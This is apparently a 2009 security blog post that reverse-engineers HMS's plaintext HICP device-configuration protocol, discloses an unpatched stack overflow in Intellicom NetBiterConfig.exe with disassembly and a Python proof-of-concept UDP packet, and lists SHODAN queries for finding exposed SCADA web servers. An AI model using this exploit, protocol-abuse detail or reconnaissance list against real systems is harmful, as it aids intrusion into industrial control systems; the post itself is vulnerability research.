Reversemode
Home
Friday, 03 September 2010
  
 
CONTENT
Home
Papers
Advisories
News Archive
Corporate Website
Downloads
Contact
About





BYTES & WORDS
Exposing HMS HICP Protocol + 0Day 'light' + SCADA_SHODAN PDF Print
Written by Rubén   
Monday, 14 December 2009

I'll be conducting a Reverse Engineering Training (8 hours = 1 day) within the context of the RootedCON Security Conference on March 15, 2010.

RootedCON 2010 will take place at the Auditorium inside the "Centro de Convenciones Mapfre", in Madrid, Spain (Europe :P), on March 18 - 20, 2010. More info: http://www.rootedcon.es


Reversemode 2.0 hehe, http://www.twitter.com/reversemode



Hi all,
After a long period of inactivity I'm back with fresh content. Today we are going to reverse a simple M2M propietary protocol developed by the swedish company HMS.In addition to this, a related 0day will be disclosed and finally, we'll learn to find out SCADA systems with the help of the new toy: SHODAN

1st PART "HMS HICP Protocol"

AFAIK there is no public documentation about this protocol, if not so please let me know and I'll repeatedly hit myself with a sharpened stick.All the information presented here has been obviously obtained by reverse engineering.
Despite of the fact that this protocol is not complex,I think it has a potential interest regarding SCADA security.You'll see why.
HICP, is intented to configure HMS's products that include ethernet/ capabilities, since they need a method for configuring Internal IP,DCHP,NetworkMask,DNS,gateway.... In 2004 HMS released a free tool named "Anybus IPconfig" which can be used to scan a network where the devices are connected, then proceeding to configure them. The components of this application are a simple MFC based GUI and a dll (hicp.dll). So let's take a look at the exports:

Code (asm)

.text:100027AF ; int __cdecl HICP_SendModuleScan()
.text:100027AF                 public ?HICP_SendModuleScan@@YAHXZ
.text:100027AF ?HICP_SendModuleScan@@YAHXZ proc near
.text:100027AF                 push    ebp
.text:100027B0                 mov     ebp, esp
.text:100027B2                 call    sub_10002175
.text:100027B7                 pop     ebp
.text:100027B8                 retn
.text:100027B8 ?HICP_SendModuleScan@@YAHXZ endp
 

In C

Code (c)

  sprintf(&Dest, "Module Scan");
  to.sa_family = AF_INET;
  *(_WORD *)&to.sa_data[0] = htons(HICP_PORT); // 3250 UDP
  *(_DWORD *)&to.sa_data[2] = htonl(IP_BROADCAST);
  v1 = strlen(&Dest);
  if ( sendto(s, &Dest, v1 + 1, 0, &to, 16) != -1 )
 

So we can see that in order to scan the network, this tool sends a broadcast UDP packet containing the string "Module Scan" to the HICP port (3250). Inside HMS-AnyBus based devices we can find a hicp daemon listening on port 3250. Once the device receives that packet it broadcasts a reply, which contains its current configuration, to the network on port 3250. The configure Tool listens on this port as well. Let's see what parameters can be configured via this protocol.

Any value after the '=' can be modified.
+“Protocol version = 1.10; ” # Obvious
+”fb type = EVIL-DEVICE; ” # Device Type
+”module version = 0.66.6; ” # ...
+”mac = 00-30-11-00-CA-FE; ” # MAC
+”ip = 192.168.1.252; ” # ...
+”sn = 255.255.255.0; ” # Network Mask
+”gw = 192.168.1.1; ” # Gateway
+”dhcp = off; ” # whether the device is using a DHCP server for obtaining the IP address. (on/off)
+”pswd = off; ” # whether the device is using a PASSWORD(on/off)
+”hn = morroBufalo; ” # hostname (optional)
+”dns1 = 192.168.1.33; ” # Primary DNS
+”dns2 = 192.168.1.34; ” # Secondary DNS (optional)
+”password = admin; ” # old password (if any, admin by default)
+”new password = fatbird; ” # new password
These parameters are sent via UDP in plain text, concatenating each one and separated by a ";".
If you want to configure a device, you need to prepend a "Configure:" string in this way: "Configure: xx-xx-xx-xx-xx-xx;"+ parameters_string. Where xx-xx-xx-xx-xx-xx is the MAC of the device you want to configure. You can take a look at HICP_SendConfigure code to verity it. This request is broadcasted so is received by any device/machine in the network listening on 3250/UDP. The device checks the MAC against it own and if matches then proceeds to update its internal registers.The first three bytes of the MAC are always 00-30-11 which correspond to the HMS' oui as expected.

In addition to this request, there are a couple of additional replyes implemented:

+ "Invalid Password:" to indicate a failed configuration attempt
+ "Reconfigured:" to indicate success.


That's all. Make your own conclusions about the security level of this protocol.I'm just presenting facts.

2nd Part "Intellicom NetBiterConfing.exe Remote Stack Overwrite". Oday Light.

Another swedish company this time, Intellicom develops a serie of SCADA products/devices named NetBiter WebSCADA which are based on HMS AnyBus RemoteCOM device.
We can download the firmware, as well as two tools to configure and update these devices respectively.Free goods are always nice.
First off, taking a look at the GUI of the tool for configuring devices, NetBiterConfig.exe, we can see that looks pretty similar to the HMS one.Except for a couple of added buttons, one to "wink" a device and the other is to start an "emergency" DHCP server, the tools contains the same components: hicp.dll and a MFC GUI. However, this one contains a surprise.
Ok, NetBiterConfig.exe is listening on 3250/UDP receiving packets for any interface, so we can send a specially crafted UDP packet from outside the network to trick the tool into thinking we are a NetBiter device.



If we fill "hn" parameter (HostName) with more than 0x20 bytes, we can start to overwrite data in the stack. By constructing a hostname of 0x60 bytes we can overwrite a pointer to an vtable of applications' subclassing methods, this can be used to achieve code execution by emulating a vtable under our control. 0x60 is not an arbitrary value, it allows us to get %esi pointing to the last 0x20 (approximately) bytes of our shellcode. The flaw is triggered when the admin double-clicks in the list box item.

The flaw is a classic strcpy without proper bounds checking in NetBiterConfig.exe
Code (asm)

.text:00403E52                 lea     edx, [ebp-0ABh]
.text:00403E58                 push    edx ; evil hostname
.text:00403E59                 lea     eax, [ebp-3CCh]
.text:00403E5F                 push    eax
.text:00403E60                 call    strcpy
 

The flaw does not exist in AnybusIpconfig.exe since it uses "strncpy":

Code (asm)

.text:00403691                 push    80h
.text:00403696                 lea     eax, [esp+0E1h]
.text:0040369D                 push    eax
.text:0040369E                 lea     ecx, [esp+494h]
.text:004036A5                 push    80h
.text:004036AA                 push    ecx
.text:004036AB                 mov     byte ptr [esp+530h], 1
.text:004036B3                 call    sub_425666
….
….
.text:004256D9                 mov     cl, [edx]
.text:004256DB                 mov     [eax], cl
.text:004256DD                 inc     eax
.text:004256DE                 inc     edx
.text:004256DF                 cmp     cl, bl
.text:004256E1                 jz      short loc_4256EB
.text:004256E3                 dec     edi
.text:004256E4                 jz      short loc_4256EB
.text:004256E6                 dec     [ebp+arg_C]
.text:004256E9                 jnz     short loc_4256D9
 



I have not contacted the vendor because I don't feel like it. I am tired of having to elaborate a high technical issue to a customer support agent who will be thinking for sure "WTF?!?".
I've got a new ethic rule: "No explicit security contact publicily available + no money involved (I'm used to eat almost three times a day) == 0day".

PoC
Code (python)

#!/usr/bin/python

# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
# Ruben Santamarta - www.reversemode.com
# For research purposes ONLY.
# If you use this code to cause damage I’ll cut you open like a f***ing pig.

import sys
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("10.10.10.10",3250))
s.send("protocol version = 1.10; "
       +"fb type = EVIL-DEVICE; "
       +"module version = 0.66.6; "
       +"mac = 00-30-11-00-BA-CA; "
       +"ip = 192.168.1.52; "
       +"sn = 255.255.255.0; "
       +"gw = 192.168.1.1; "
       +"dhcp = off; "
       +"pswd = off; "
       +"hn = "+"A"*0×60+"; "
       +"dns1 = 192.168.1.33;")
 

Another interesting thing is that you can download the firmware for free. The firmware is a .bin file that is comprised of a 0x5F bytes header, which includes a magic 'NBU'+MajorMinorVersion+ImageSize+Checksum+VersionString, followed by a simple gz file so if we cut off the header we can decompress the remaining gz file. Cool. The firmware is a custom linux for MotorolaColdFire processor. It contains interesting stuff like default password...

3rd PART

SHODAN is in da house. This means...SCADA systems. Watch out!, don't mess with this type of systems if you don't know what you are really doing. I am not responsible in any manner of any damage you can cause.

Fuji Electric Embedded Web Server:
http://shodan.surtri.com/?q=fuji+electric

Ouman embedded Web Server for SCADA + NetBiter WebSCADA
http://shodan.surtri.com/?q=webscada

eWon
http://shodan.surtri.com/?q=ewon

Boa Web Server
http://shodan.surtri.com/?q=boa

EIG Embedded Web Server
http://shodan.surtri.com/?q=EIG

EnergyICT
http://shodan.surtri.com/?q=energyICT

Z-World Rabbit
http://shodan.surtri.com/?q=Z-World+Rabbit

Niagara Framework
http://shodan.surtri.com/?q=Niagara

HMS
http://shodan.surtri.com/?q=HMS


Last Updated ( Sunday, 21 March 2010 )
< Prev   Next >
 
"Nevertheless, it does move"
Galileo